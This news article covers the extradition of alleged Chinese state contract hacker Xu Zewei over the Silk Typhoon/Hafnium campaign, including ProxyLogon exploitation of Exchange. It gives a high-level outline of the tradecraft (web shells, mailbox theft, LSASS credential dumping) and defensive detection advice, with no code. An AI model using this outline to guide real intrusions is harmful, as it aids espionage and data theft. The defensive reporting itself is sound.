A Chinese national alleged to be a contract hacker for China's Ministry of State Security has been extradited from Italy to the United States to face cyberespionage charges. Xu Zewei, tied by U.S. prosecutors to the Silk Typhoon (Hafnium) intrusion set, is accused of conducting state-directed breaches between February 2020 and June 2021, including the mass exploitation of Microsoft Exchange Server zero-days that compromised thousands of organizations worldwide.

What Happened

The U.S. Department of Justice announced the extradition of Xu Zewei from Italy following his 2025 arrest in Milan at the request of American authorities. According to court documents, Xu operated as a contract hacker on behalf of the Shanghai State Security Bureau (SSSB), a regional arm of the PRC's Ministry of State Security (MSS), while employed by Shanghai Powerock Network Co., Ltd. The DOJ describes Powerock as one of multiple front companies leveraged by Beijing to conduct offensive cyber operations at arm's length from formal state intelligence apparatus.

Xu is alleged to have participated in a sustained campaign of intrusions over a roughly 16-month period, working alongside co-conspirators directed by MSS officers. He now faces multiple federal counts related to computer intrusions and conspiracy, with an initial appearance in U.S. federal court forthcoming.

What Was Taken

Prosecutors allege the Silk Typhoon campaign tied to Xu targeted high-value research and communications data:

• COVID-19 research data: vaccine, treatment, and diagnostic testing information stolen from medical research organizations during the height of the pandemic response.
• Email mailbox contents: full mailbox access obtained from compromised Microsoft Exchange Servers, exposing sensitive internal communications.
• Network reconnaissance and lateral movement data: indicating broader access to victim environments beyond email, with potential exfiltration of additional intellectual property and strategic intelligence.

The Exchange exploitation campaign that began in late 2020 affected thousands of organizations globally before patches were broadly deployed, making the realistic scope of stolen data orders of magnitude larger than the named victims in the indictment.

Why It Matters

This extradition is one of the few times a named MSS contract operator has been transferred to U.S. custody to stand trial, and it lands hard for several reasons. It reinforces the now well-documented Chinese intelligence model of laundering state-directed intrusions through nominally private "network technology" companies, providing operational deniability while sustaining a deep bench of capable hackers. It also signals that allied jurisdictions, including Italy, are increasingly willing to act on U.S. extradition requests against alleged Chinese state cyber operatives, raising the personal risk calculus for contractors who travel outside the PRC.

For defenders, the case serves as a reminder that Silk Typhoon/Hafnium activity is not merely an artifact of the 2021 Exchange crisis. The same operators, tooling, and tradecraft remain active, and the strategic targeting priorities, biomedical research, government communications, and managed service providers, are unchanged.

The Attack Technique

According to the indictment, Xu's alleged tradecraft aligns with publicly documented Silk Typhoon and Hafnium tooling:

• Initial access via internet-facing vulnerabilities: exploitation of unpatched, externally exposed systems, including the ProxyLogon family of Microsoft Exchange Server zero-days disclosed in early 2021 (CVE-2021-26855 and the chained CVEs).
• Web shell deployment: post-exploitation placement of web shells on compromised Exchange servers to maintain persistence and provide an interactive foothold.
• Mailbox access and data theft: direct extraction of mailbox contents using the web shell foothold.
• Lateral movement and reconnaissance: pivoting from the Exchange beachhead deeper into victim networks to identify and exfiltrate additional data of intelligence value.
• Tasking via MSS handlers: targets and intelligence requirements allegedly assigned by Shanghai State Security Bureau officers, with Powerock acting as the contracting wrapper.

What Organizations Should Do

1. Hunt for legacy Hafnium/Silk Typhoon web shells: even patched Exchange environments may retain undiscovered web shells from the 2020 to 2021 mass exploitation window. Audit on-prem Exchange for unauthorized .aspx files, anomalous IIS worker process child processes, and unexpected scheduled tasks.
2. Retire or hard-isolate on-prem Exchange where feasible: prioritize migration to hosted email or, at minimum, place remaining on-prem Exchange behind authenticated reverse proxies and restrict OWA/ECP exposure to the public internet.
3. Patch and monitor edge appliances aggressively: Silk Typhoon's broader playbook routinely targets internet-facing devices beyond Exchange, including VPNs, file transfer appliances, and remote management tools. Treat n-day patching of perimeter systems as a 24- to 72-hour SLA.
4. Apply targeted detections for Silk Typhoon TTPs: deploy detections for ProxyLogon-style exploitation chains, suspicious w3wp.exe child processes, China Chopper and similar web shells, and credential dumping via LSASS access from web-tier hosts.
5. Tighten egress controls and DNS visibility: web shell operators rely on outbound HTTPS to attacker infrastructure. Egress filtering, TLS inspection where lawful, and DNS logging materially raise the cost of post-exploitation activity.
6. Treat biomedical, government adjacent, and MSP environments as priority targets: organizations in these verticals should assume active interest from Chinese state aligned actors and align threat models, red team scenarios, and tabletop exercises accordingly.

Sources: Alleged Silk Typhoon hacker extradited to US for cyberespionage